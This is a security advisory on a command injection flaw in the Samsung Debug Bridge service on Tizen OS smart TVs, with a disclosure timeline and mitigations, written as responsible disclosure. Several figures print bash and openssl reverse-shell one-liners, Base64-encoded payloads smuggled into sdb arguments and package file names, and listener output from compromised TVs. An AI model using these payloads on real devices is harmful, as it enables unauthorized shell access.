Samsung Tizen OS | Version Through 9.0
The following document describes identified vulnerabilities in the Samsung Tizen operating system up to and including version 9.0.
Product Vendor
Samsung
Product Description
Tizen is a Linux-based, open-sourced operating system used in a variety of mobile and smart devices, developed and primarily used by Samsung. The project’s official website is tizen.org. The latest version of the application is 9.0, which began rolling out in October 2024.
Vulnerabilities List
One vulnerability was identified within the Tizen OS platform:
- Arbitrary Command Injection
This vulnerability is described in the following section.
Affected Version
Versions through 9.0.
Summary of Findings
Bishop Fox staff identified one vulnerability in Samsung Tizen OS. This vulnerability could allow users of Samsung smart televisions running Tizen OS to execute arbitrary code at an operating system (OS) level on the devices.
Exploiting the vulnerability required that the smart television (TV) have developer mode enabled, and that the exploitation was performed from the IP address that was configured as the developer mode host IP on the smart TV, which would require close proximity to the television.
Bishop Fox staff demonstrated that the issue was exploitable in Tizen OS versions 5.5, 7.0, 8.0, and 9.0. Bishop Fox staff did not test other Tizen OS releases but believe all Tizen OS versions that support the Samsung Debug Bridge (SDB) developer tool are likely to be affected.
Impact
While this issue presents minimal direct risk, it nevertheless allows for the circumvention of controls that Samsung uses to restrict operating system access on Tizen-based smart televisions. Samsung’s branded Tizen images are configured to prevent device owners and users from accessing the underlying operating system. The identified vulnerability demonstrates that these controls can be bypassed, indicating that the intended security boundary is not fully enforced as designed.
Although exploitation requires developer mode to be enabled and the attacker to operate from the configured developer host IP (conditions that limit opportunistic abuse), the presence of OS-level command execution capability expands the theoretical attack surface of the device. Smart televisions are frequently deployed as shared, network-connected devices in corporate offices, conference rooms, healthcare facilities, hospitality environments, educational institutions, and other public or semi-public settings. In such environments, physical proximity and shared network access are more plausible than in private home use.
Even with Samsung’s additional operating system protections and application signature enforcement in place, arbitrary command execution may provide an opportunity for further experimentation, reconnaissance, or chaining with other vulnerabilities. While no direct access to sensitive user data or application compromise was identified during testing, the ability to execute commands at the operating system level may increase exposure if combined with additional weaknesses or misconfigurations in enterprise network environments.
Solution
Update when a patch is available. For TVs located in public places or within range of public access, we recommend placing into Kiosk mode to prevent access to developer tools.
Timeline
- 02/18/2025: Initial discovery
- 10/09/2025: Contact with vendor
- 11/06/2025: Vendor acknowledged vulnerabilities
- 02/24/2026: Vulnerabilities publicly disclosed
Credits
- Thomas Wilson, Senior Consultant, Bishop Fox ([email protected])
- Ben Lincoln, Principal Consultant, Bishop Fox ([email protected])
Samsung Tizen OS Through Version 9.0 — Vulnerabilities
Arbitrary Command Injection
Tizen OS was affected by an arbitrary command injection vulnerability wherein an attacker with access to a Tizen OS TV with developer mode enabled could inject arbitrary commands to the TV by running SDB installation commands with malicious package names.
Vulnerability Details
CVE ID: CVE coming soon (SVE-2025-50109)
Vulnerability Type: Command Injection
Access Vector: ☐ Remote, ☐ Local, ☒ Physical, ☐ Context dependent, ☐ Other (if other, please specify)
Impact: ☒ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☐ Information disclosure, ☐ Other (if other, please specify)
Security Risk: ☐ Critical, ☐ High, ☐ Medium, ☒ Low
Vulnerability: CWE-78
Bishop Fox researchers determined that the Samsung Debug Bridge (SDB) Service running on Tizen TV operating systems was susceptible to OS-level command injection from the IP address configured as the developer-mode host PC. The owner of a Samsung smart TV could exploit this issue to bypass security controls implemented by Samsung in their branded Tizen OS images, including physical smart TVs.
In unbranded Tizen OS images, the SDB service allowed developers to access non-privileged or privileged OS shells using the sdb root on and sdb shell commands, as shown below:
> .\sdb devices List of devices attached emulator-26101 device T-8.0-x86_64 > .\sdb shell sh-3.2$ whoami owner sh-3.2$ exit > .\sdb root on Switched to 'root' account mode > .\sdb shell root:~> whoami root
FIGURE 1 – SDB shell access commands in use with an unbranded Tizen OS image
However, in Samsung-branded Tizen OS images and physical Samsung smart TVs, the SDB service blocked access to OS shells, as shown below:
> .\sdb devices List of devices attached emulator-26101 device T-samsung-9.0-x86 > .\sdb shell closed closed > .\sdb root on Permission denied
FIGURE 2 – Shell access denied by branded Tizen OS 9.0 image
This indicated that Samsung wished to prevent developers and owners of Samsung smart TVs from accessing this functionality.
Bishop Fox staff determined via packet capture that when using the sdb install command, the sdb utility used the shell command internally to trigger the installation process on the Tizen OS device. For example, when a developer executed the command sdb install test.tpk on the host PC, the sdb utility sent the following string to the SDB service on the Tizen OS device:
shell:0 appinstall tpk test.tpk
FIGURE 3 – Internal representation of TPK package installation command
Bishop Fox staff discovered that the SDB service’s shell command invocation was vulnerable to OS command injection and could be exploited by using crafted sdb shell or sdb install commands.
For example, Bishop Fox staff created as Base64-encoded version of the following payload, which executed a reverse TCP shell connection to port 49087 on a Linux VM with the IP address 10.1.10.161:
bash -i >& /dev/tcp/10.1.10.161/49087 0>&1
FIGURE 4 – Bash reverse TCP shell one-liner
Bishop Fox staff determined that Windows PowerShell required extensive escaping of the necessary shell metacharacters, and executed the following commands to switch to the legacy Windows Command Prompt and exploit the command injection vulnerability:
> cmd
Microsoft Windows [Version 10.0.26100.6584]
(c) Microsoft Corporation. All rights reserved.
>sdb shell "0 appinstall tpk test.tpk`echo${IFS}-n${IFS}'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEwLjE2MS80OTA4NyAwPiYx'|base64${IFS}-d|bash`.tpk"
FIGURE 5 – Executing encoded payload
On the Linux VM, the waiting nc listener received the connection, as shown below:
$ nc -nvlkp 49087 listening on [any] 49087 ... connect to [10.1.10.161] from (UNKNOWN) [10.1.10.216] 57686 bash: no job control in this shell bash: /root/.bashrc: Permission denied bash-3.2$ whoami sdk
FIGURE 6 – Reverse shell connection from emulated Tizen OS device
Bishop Fox staff determined that other shell metacharacters could also be used to inject OS commands against emulated devices, such as the following alternative syntax for the payload above:
>sdb shell "0 appinstall tpk test.tpk$(echo${IFS}-n${IFS}'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEwLjE2MS80OTA4NyAwPiYx'|base64${IFS}-d|bash).tpk"
FIGURE 7 – Command injection using $() syntax instead of backticks
Bishop Fox staff found that exploiting the issue via the sdb install command required creating a file on the host PC whose name contained the necessary Linux shell metacharacters. For example, Bishop Fox staff began with the following reverse shell payload based on the openssl binary:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.227:80 > /tmp/s; rm /tmp/s
FIGURE 8 – openssl reverse TCP shell one-liner
Bishop Fox staff then created an empty file with the following name, which contained the necessary shell metacharacters and a Base64-encoded version of the payload:
new2.tpk`echo${IFS}-n${IFS}bWtmaWZvIC90bXAvczsgL2Jpbi9zaCAtaSA8IC90bXAvcyAyPiYxIHwgb3BlbnNzbCBzX2NsaWVudCAtcXVpZXQgLWNvbm5lY3QgMTkyLjE2OC4xLjIyNzo4MCA+IC90bXAvczsgcm0gL3RtcC9z|base64${IFS}-d|bash`.tpk
FIGURE 9 – Filename with command injection characters
Bishop Fox staff then executed the encoded payload using the following command:
sdb install new2.tpk`echo${IFS}-n${IFS}bWtmaWZvIC90bXAvczsgL2Jpbi9zaCAtaSA8IC90bXAvcyAyPiYxIHwgb3BlbnNzbCBzX2NsaWVudCAtcXVpZXQgLWNvbm5lY3QgMTkyLjE2OC4xLjIyNzo4MCA+IC90bXAvczsgcm0gL3RtcC9z|base64${IFS}-d|bash`.tpk
FIGURE 10 – Exploitation via sdb install command
To ensure that exposure was not limited to emulated devices, Bishop Fox staff demonstrated exploitation on three physical Samsung smart TVs:
- A 2020 43” Samsung model UN43TU700DFXZA smart TV with Tizen 5.5
- A 2022 55” Samsung model UN55CU7000 smart TV with Tizen 7.0
- A 2024 55” Samsung model QN55Q60DAFXZA smart TV with a 2025 build of Tizen 8.0
Bishop Fox staff first put each smart TV into developer mode using the instructions found at the “Samsung Developer: Connecting Smart TV and Visual Studio” and configured the IP address of their laptop as the host PC IP.
Bishop Fox staff executed the following commands to verify that SDB shell access was blocked, then execute the Bash reverse TCP shell payload on the QN55Q60DAFXZA smart TV:
>sdb connect 10.1.10.179
connecting to 10.1.10.179:26101 ...
connected to 10.1.10.179:26101
>sdb devices
List of devices attached
10.1.10.179:26101 device QN55Q60DAFXZA
>sdb shell
closed
closed
>sdb root on
Permission denied
>sdb shell "0 appinstall tpk test.tpk$(echo${IFS}-n${IFS}'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEwLjE2MS80OTA4NyAwPiYx'|base64${IFS}-d|bash).tpk"
FIGURE 11 – Exploitation of Samsung QN55Q60DAFXZA smart TV
As shown below, the reverse shell connected, and Bishop Fox staff verified that the device was running a build of Tizen 8.0 from February 2025:
$ nc -nvlkp 49087 listening on [any] 49087 ... connect to [10.1.10.161] from (UNKNOWN) [10.1.10.179] 54960 bash: no job control in this shell bash: /root/.bashrc: Permission denied bash-3.2$ whoami sdk bash-3.2$ cat /etc/tizen-release Tizen8/TV 8.0.0 (arm) VERSION = 8.0.0 CODENAME = TSEVENDF BUILD_ID=T-NKLDAKUC-REL-202502052157 bash-3.2$ cat /etc/tizen-build.conf TZ_BUILD_RELEASE_NAME="Tizen8/TV" TZ_BUILD_VERSION=8.0 TZ_BUILD_FULLVER=8.0.0 TZ_BUILD_RELEASE_TYPE=eng TZ_BUILD_VARIANT=NONE TZ_BUILD_PROFILE=tv TZ_BUILD_PROJECT=TIZEN:8.0:Base:OSU TZ_BUILD_VENDOR=tizen TZ_BUILD_REPO=standard TZ_BUILD_ARCH=arm TZ_BUILD_ID=latest TZ_BUILD_DATE=20250205_132718 TZ_BUILD_TIME=13:27:18 TZ_BUILD_TS=1738762038 …omitted for brevity…
FIGURE 12 – Shell access on Samsung QN55Q60DAFXZA smart TV
To demonstrate exploitation of the Samsung UN55U7000 smart TV, Bishop Fox staff used the crafted sdb install command, as shown below:
$ ./sdb install new2.tpk`echo${IFS}-n${IFS}bWtmaWZvIC90bXAvczsgL2Jpbi9zaCAtaSA8IC90bXAvcyAyPiYxIHwgb3BlbnNzbCBzX2NsaWVudCAtcXVpZXQgLWNvbm5lY3QgMTkyLjE2OC4xLjIyNzo4MCA+IC90bXAvczsgcm0gL3RtcC9z|base64${IFS}-d|bash`.tpk
1 file(s) pushed. O file(s) skipped.
FIGURE 13 – Running crafted SDB install command
After executing the command, the team received a remote shell from the TV on an openssl listener established previously, as shown below:
$ sudo openssl s_server -quiet -key key.pem -cert cert.pem -port 80 sh: no job control in this shell sh-3.2$ whoami sdk sh-3.2$ uname -a Linux Samsung 5.4.77 #1 SMP PREEMPT Sun Sep 22 15:53:00 UTC 2024 armv7l GNU/Linux
FIGURE 14 – Receiving a connection from the Samsung TV
As indicated in the summary of this report, this finding is not indicative of widespread active exploitation and does not represent a high-severity remote compromise scenario. However, because the vulnerability undermines a deliberate platform restriction intended to prevent OS-level access, and because these devices are widely deployed in shared and business environments, transparency is warranted. Public disclosure enables organizations to make informed decisions regarding network segmentation, device configuration (such as disabling developer mode), and use of kiosk mode in publicly accessible deployments.
Subscribe to our blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.
